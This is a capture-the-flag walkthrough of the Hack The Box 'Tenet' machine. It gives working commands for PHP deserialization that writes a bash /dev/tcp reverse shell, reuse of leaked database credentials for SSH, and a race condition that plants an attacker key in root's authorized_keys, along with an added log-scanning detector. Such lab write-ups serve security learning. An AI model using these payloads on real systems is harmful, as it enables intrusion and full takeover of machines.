HTB Tenet Writeup
INFO
Machine IP = 10.10.10.223
OS = Linux
Level = MEDIUM
Points = 30
Write the IP of the machine to your /etc/hosts file
echo "10.10.10.223 tenet.htb" >> /etc/hosts
Scanning
nmap -sC -sV 10.10.10.223
Enumeration
Port 80 – WordPress Blog
Create a directory tenet, cd into it, and run Gobuster:
gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
- -x, --extensions string   File extension(s) to search for
- -t, --threads int         Number of concurrent threads (default 10)
We notice in the /Wordpress page there is a post called Migration with a comment by the user neil:
did you remove the sator php file and the backup?? the migration program is incomplete!
why would you do this?!
It seems there is a backup site called sator.php. After adding sator.tenet.htb to our /etc/hosts file and navigating to the URL
http://10.10.10.223/sator.php
we see this:
[+] Grabbing users from text file
[] Database updated
So, the PHP file is there and it gets executed. Since the user neil mentioned a backup file, let's try to download it:
wget http://sator.tenet.htb/sator.php.bak
After downloading sator.php.bak, rename it to sator.php and check the code:
# sator.php
<?php
class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = 'Success';
    }

    // Runs when the object is destroyed: writes $data into $user_file.
    // With attacker-controlled properties this becomes an arbitrary file write.
    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

// Untrusted GET input goes straight into unserialize()
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app->update_db();
?>
We see that the script takes the GET parameter arepo and passes it straight to unserialize(). Because DatabaseExport::__destruct() writes $data into $user_file, a crafted serialized object lets us choose both the file name and its contents: an arbitrary file write in the web root. To exploit this, let's look at Exploiting PHP Deserialization.
To write the exploit, let's do the following:
- Write the class DatabaseExport on our local machine, define the user_file to be a php file and the data to be a php reverse shell to our local machine.
- Serialize it and urlencode it to pass to the GET variable.
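From the defender's side, this attack leaves a recognisable trace in the web server access log: a query parameter whose decoded value is a PHP serialized object (O:<len>:"Class":...), here with a string property pointing at a .php file name. The following Python script is an added example, not part of the original writeup; it scans constructed Apache-style log lines (IPs, timestamps and the object contents are made up) and reports such requests.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Combined-log prefix: client IP ... "METHOD /path?query HTTP/x"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# PHP serialized object header: O:<len>:"<class>":<nprops>:{
PHP_OBJ_RE = re.compile(r'O:\d+:"(?P<cls>[A-Za-z_][A-Za-z0-9_\\]*)":\d+:\{')
# A string property with a string value inside a serialized object
PHP_STR_PROP_RE = re.compile(r's:\d+:"(?P<name>[^"]+)";s:\d+:"(?P<val>[^"]*)";')

def inspect_line(line):
    """Return one finding per query parameter whose decoded value carries a
    PHP serialized object. Each finding lists string properties whose value
    ends in .php, the sign that the object is being used to drop PHP code."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group('target')).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decode again to catch double-encoding
            for candidate in [value, unquote_plus(value)]:
                obj = PHP_OBJ_RE.search(candidate)
                if not obj:
                    continue
                php_props = [p.group('name') for p in PHP_STR_PROP_RE.finditer(candidate)
                             if p.group('val').lower().endswith('.php')]
                findings.append({'ip': m.group('ip'), 'param': param,
                                 'class': obj.group('cls'), 'php_file_props': php_props})
                break
    return findings

def scan_log(lines):
    """Run inspect_line over an iterable of raw log lines."""
    findings = []
    for line in lines:
        findings.extend(inspect_line(line.rstrip('\n')))
    return findings

# Constructed sample lines: one benign request and one injected DatabaseExport
# object (user_file pointed at a .php name; data kept to a harmless string).
SAMPLE_LOG = [
    '203.0.113.9 - - [18/Jan/2021:10:00:05 +0000] "GET /index.php?p=1 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Jan/2021:10:00:09 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7B'
    's%3A9%3A%22user_file%22%3Bs%3A11%3A%22exploit.php%22%3Bs%3A4%3A%22data%22%3Bs%3A4%3A%22test%22%3B%7D'
    ' HTTP/1.1" 200 61 "-" "curl/7.74.0"',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} sent serialized {f['class']} in ?{f['param']}; .php-valued props: {f['php_file_props']}")
```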
Now, open a php interactive cli using:
php -a
Write the following:
// Same class name and property names as the target; only the values change
class DatabaseExport {
    public $user_file = 'exploit.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/<Your IP address>/<Port for reverse connection> 0>&1\'"); ?>';
}
// Serialize the object and URL-encode it so it can be passed in the GET parameter
print urlencode(serialize(new DatabaseExport));
The payload is generated. Copy the URL encoded output and make the request using curl:
curl -i http://sator.tenet.htb/sator.php?arepo=<Add URL encoded output here>
Open an nc listener on the port you used in the payload:
nc -nvlp <Your Port>
and get a reverse shell by browsing to:
10.10.10.223/exploit.php
Now we have a reverse shell
Privilege Escalation
Checking the /wordpress directory, we find credentials: run cat wp-config.php and we get this DB configuration:
define( 'DB_USER', 'neil' );
define( 'DB_PASSWORD', 'Opera2112' );
SSH into the box with user neil and password Opera2112:
ssh neil@10.10.10.223
Getting Root
Check our privileges as the user neil:
neil@tenet:/$ sudo -l
User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
Checking the file /usr/local/bin/enableSSH.sh, we see the following function:
addKey() {
    tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)   # -u only picks a name, nothing is created yet
    (umask 110; touch $tmpName)              # file is created world-writable (0666)
    /bin/echo $key >>$tmpName
    checkFile $tmpName
    /bin/cat $tmpName >>/root/.ssh/authorized_keys   # whatever is in the file at this moment gets trusted
    /bin/rm $tmpName
}
The script:
- Generates an SSH public key (id_rsa.pub) and writes it to the temp file /tmp/ssh-XXXXXXXX
- Appends the contents of this file to /root/.ssh/authorized_keys
- Deletes the tmp file
Because the temp file is world-writable during the short window between the write and the cat, its contents can be replaced before they are appended to authorized_keys (a race condition). Let's do the 3 steps to exploit this.
Step 1
First create an id_rsa key pair on your local machine using ssh-keygen.
Run the following loop as neil and leave it running in this session:
neil@tenet:/$ while true; do echo "YOUR id_rsa.pub key" | tee /tmp/ssh-*; done
This continuously writes your public key into any /tmp/ssh-* file that appears.
Step 2
In a second session as neil, run the enableSSH.sh script repeatedly until we get a success message:
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
Step 3
On your local host, restrict the permissions on the private key:
kali@kali:~/.ssh$ chmod 600 id_rsa
Then ssh into the tenet box as root:
kali@kali:~/.ssh$ ssh -i id_rsa root@10.10.10.223
Done!